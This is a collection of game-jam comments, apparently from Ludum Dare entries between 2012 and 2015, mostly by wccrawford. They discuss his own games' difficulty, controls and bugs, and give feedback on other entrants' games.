LD25 — You are the Villain

Slaughter by wccrawford 2012-12-17T12:15:00

@rasmusrn Yeah, it's a pretty quick game. I think I could have done a lot of things to make it easier, like slow down the player and bullets, take gravity down a notch, etc.

But then it's just a crappy sidescroller with nothing going for it, IMO. At least with the difficulty this high, there's something to work for.

I admit that it's not very rewarding if you don't like the challenge.

Thanks for the comments everyone!

Slaughter by wccrawford 2012-12-17T14:21:00

@raincole It is... But it's not really obvious why until you beat it. Which is too hard, even though there's only 2 levels. Originally I had planned to do more on the theme, but I found my knowledge lacking and didn't have time to learn the bits I needed.

Slaughter by wccrawford 2012-12-18T10:48:00

@Felix20 I'm guessing your joystick has different axes than mine and that's why it didn't work. I've added the Windows version now, which allows you to rebind the keys. (Unity feature, I didn't add it.)

Slaughter by wccrawford 2012-12-21T12:41:00

I guess I could spoil the end. It's pretty lame, to be honest. It just says something like, "Why did you kill all those people? You monster!"

I had originally planned to have a plot, but realized that I didn't have enough time to learn how to create a dialogue system in time. I plan to have learned that and a few other things before the next LD. I have to say, LDs have been great for showing me what skills I need to work on.

Slaughter by wccrawford 2012-12-27T17:22:00

@Tobias I do, actually. The game does run fast. I thought the mechanics felt smooth like that, so I didn't slow them down. I could have made it slower and it'd be more like a bullet-hell sidescroller. It was tempting.

If I made another in the future, I've learned a lot from this one about how to make it easier without cheezing out and just changing hitpoints and crap.

Slaughter by wccrawford 2013-01-08T13:54:00

Thanks for the comments everyone! I don't plan to make a post-compo version because I have a lot of other ideas I'm working on, and this really isn't my genre. But as I said before, I learned a lot from this entry.

Next time, I expect my game to be better.

We Meet Again, Mr. Mond! by Luis Anton 2012-12-19T12:41:00

Oh man, I need more than 5 points for 'innovation' now. You've broken the scale. I love this idea!

Victor Grozny by DustyStylus 2012-12-16T20:28:00

Not bad! I could see this working with some plot and objectives.

I think it's be more fun with 4 physical knobs, too. The mouse was a big hard to control.

Crime Scene by saulotti 2012-12-17T14:31:00

Web version isn't completeable. You need to set the HTML so that unity will get the right-click, instead of popping up the menu.

Crime Scene by saulotti 2012-12-17T19:52:00

It's actually an option when exporting the game. Just choose the template that allows right-clicks, instead of the default web template. Personally, I wouldn't count that as coding and you *are* allowed to create other distributions during the voting.

Up to you, though.

Praelia Solus by rftr 2012-12-17T21:39:00

You can fix the 'chrome bug' by using http instead of https.

LD26 — Minimalism

Flourish by Beanalby 2013-04-30T17:03:00

It's too bad you didn't have time to add more mechanics to it. It seems like it had potential!

Simply Escape by wccrawford 2013-04-28T17:08:00

Windows is the better experience due to the issues with grabbing the mouse cursor in a web player.

Mouse control is the only real option. Gamepad will move you around, but only the left mouse button will activate things.

Simply Escape by wccrawford 2013-04-29T11:28:00

If (probably when) I make another of these, I'll definitely do the crosshair targeting differently. This way didn't work well at all, but it was all I could come up with in time.

I had actually seen the 'through the wall' bug for the key, but forgot to fix it. Oops! It's a simple fix, too.

I know it was a bit lacking in 'fun' because of the minimalist aspects. I had hoped to add a couple more rooms, with more and harder to find stuff, but time just didn't allow for it.

Thanks for the feedback so far everyone! :)

Simply Escape by wccrawford 2013-04-30T01:16:00

That's weird behavior indeed. My targeting solution was horrible, though, so I'm just not surprised by any problems people have with it. I'm definitely completely redoing that part in the future.

Simply Escape by wccrawford 2013-04-30T21:44:00

Yeah, I agree the mouse was poorly done. I'll definitely look into doing that better in the future.

@anatolat I never considered that! I wonder what I could have done to prevent that idea... I was trying to make it real simple, so red-herrings weren't really something I tried for.

I'm glad everyone seems to have enjoyed it!

Simply Escape by wccrawford 2013-05-06T11:21:00

Yeah, I was of 2 minds about whether to disable the safe in the first 2 rooms. I actually had started to do so, and then decided I wanted them enabled. (Both for my ease, and for consistency.) Congrats on finding the combo there. ;)

Metahotel by Christian S. 2013-05-07T18:13:00

Love puzzle games! This was great!

PLOG by Gungnir 2013-05-02T18:22:00

Great idea!

Wish is had gotten harder. Faster movement, spinning shapes, etc. Eventually just suicided because I knew I'd never lose unless I fell asleep.

Min by smotko 2013-04-29T11:48:00

Overall I liked it. It felt like there wasn't enough challenge, though.

Also, not being able to move while *seeing* a black line was confusing. I thought you merely couldn't touch them. It always felt like I was being unfairly restricted.

And the movement was off. I expected to be able to hold the key and move repeated, but was instead forced to repeatedly tap the keys.

Good job, though!

MagnoMonster by puttputt 2013-04-29T12:46:00

Sometimes the spacebar didn't actually switch the polarity, and that was painful. It looked like it'd switch, then suddenly be back where it started.

Mini Hero by sharbelfs 2013-04-29T23:45:00

Very nice. I love puzzle games.

Unfortunately, I've had it lock up a couple times. Once, it refused to show the second board at all. The next, it didn't recognize the solution as being finished. I didn't take off points for that, of course, it was just disappointing not to be able to finish the story.

DHRDR by johnste 2013-04-29T11:57:00

There was a chair stuck in the floor, so I couldn't continue. And falling off the edge means falling forever.

I also had some trouble with the controls, and often ended up upside-down, which was frustrating.

Overall really well done, though!

MiniFPX by KhaoTom 2013-04-30T21:39:00

The middleware doesn't have to be free to join the compo. It just has to be 'publicly available.'

"All publicly available libraries and middleware are allowed."

No mention of free. They're just preventing you from unfairly stockpiling code before the competition.

MIN by s0ulcrusher 2013-04-30T15:54:00

The jumping was harder than it should be. I'd be running and sure I had room to jump, and the jump button would just fail me.

The end was a little long, too. Seemed to just go on forever.

LD27 — 10 Seconds

10 Seconds at the Carnival! by wccrawford 2013-08-25T13:48:00

I did add another game, yes! Dart Throw is now in. I'm wracking my brains for others that are within my ability before the close, but I think that's probably the last one.

As for the physics glitches, I know about them, and I've decided not to further adjust the physics for them. It's kind of fun to play around and get rings linked together and stuff.

I don't think you can edit comments. You can edit your entry by going back to the submit link and your previous information will already be there.

10 Seconds at the Carnival! by wccrawford 2013-08-27T01:30:00

Yeah, I was afraid the audio would get repetitive.

And yeah, I'm definitely not an artist. It's one of the things I want to work on before the next LD, but I know I'll need a lot of practice to get better at it.

As for the unfairness, yeah... I saw all that coming, and I decided that it spiced up the game more than it hurt it. The alternative was to spend a lot of time thinking up interesting layouts and programming in a way to switch between them randomly. Or to make sure there were 2 of each color and leave the rest white.

In the end, I decided I didn't really have time, and spent my time on the sound instead. The original version I submitted (at around 24 hours in the compo) had no sound at all!

I'm super happy that everyone is having so much fun with this game! 80/50/71 is pretty impressive, too.

10 Seconds at the Carnival! by wccrawford 2013-08-27T17:23:00

I've added options to disable the music and the barker to the Post-Compo versions!

10 Seconds at the Carnival! by wccrawford 2013-09-06T11:52:00

Awesome! Thanks for showing off my game!

hurry! by hughsk 2013-08-26T04:33:00

Seems to work well enough (on Chrome), but I kind of wish there was a point to it. Shooting red spheres gets old quite quickly.

PROBE TEAM by Andrew Shouldice 2013-08-29T16:24:00

I love it!

I actually had a similar idea (exploration, successive drones can go further) but was unable to flesh it out in a reasonable time and switched ideas.

You really nailed this one! I'm a little jealous. :)

10 Second Sculptor by nathanhoffer 2013-08-26T04:51:00

More mouse control would have been nice. Having to press the keyboard enter (as opposed to keypad enter) was kind of a pain. Should have been able to click to continue at the end of each puzzle, and click the colors to choose them.

Ten Seconds To Live by TiRSO! 2013-08-27T15:14:00

That was a great game!

LD31 — Entire Game on One Screen

Pattern Puzzle by wccrawford 2014-12-08T10:17:00

Each 'level' has its own pattern that you have to figure out. The levels are randomized each time you reload the page to provide additional challenge.

Pattern Puzzle by wccrawford 2014-12-08T12:43:00

Perhaps the randomization was a mistake then. Before that, there were easier patterns at the start... Now they're all mixed in.

Pattern Puzzle by wccrawford 2014-12-09T14:19:00

Yeah, if I were to do this again, I'd make the timer and randomization an option so that you can take the time to learn each of the patterns, starting from the easy ones. Then once you're ready, you can turn on the hard mode and see how you score.

I'd also liked to have made the patterns more obvious. So many of them are so short that it's hard to tell what you've done while you're experimenting.

Pattern Puzzle by wccrawford 2014-12-25T13:10:00

Thanks for the excellent feedback everyone. I think I fell victim to being too good at my own game because I knew everything about it. I hope when I go to actually sell a game that I can find testers that will give me as much good feedback as I've gotten here. :)

I absolutely agree with all the feedback I've gotten. A lot of it expresses things that I could kind of feel, but couldn't name. Seeing it in writing is very enlightening.

Thanks again, everyone!

Clicking on the Windows link says the folder can no longer be viewed. Google probably didn't like the traffic.

Farm for Space by pixzleone 2014-12-08T12:54:00

Random game-overs suck. The meteors fall *way* too fast to be able to dodge, and being inside the house doesn't help. This makes it a game of luck rather than skill.

LD34 — Two Button Controls / Growing

Isn't that crate? by Codexus 2015-12-16T19:50:00

I'm pretty sure my solution for the final method wasn't the intended one. But nice game!

Cosmo Hopper by PlasterPhantom 2015-12-16T14:24:00

Very well done! I got to the last upgrade and ran out of memory on the webgl version with Chrome/OS X.

I expected to dislike the game when I first started, but the upgrades really worked out well.

Major Tom by OberynMartell 2015-12-16T18:43:00

I got mid-way through level 5 before webgl ran out of memory. OSX/Chrome.
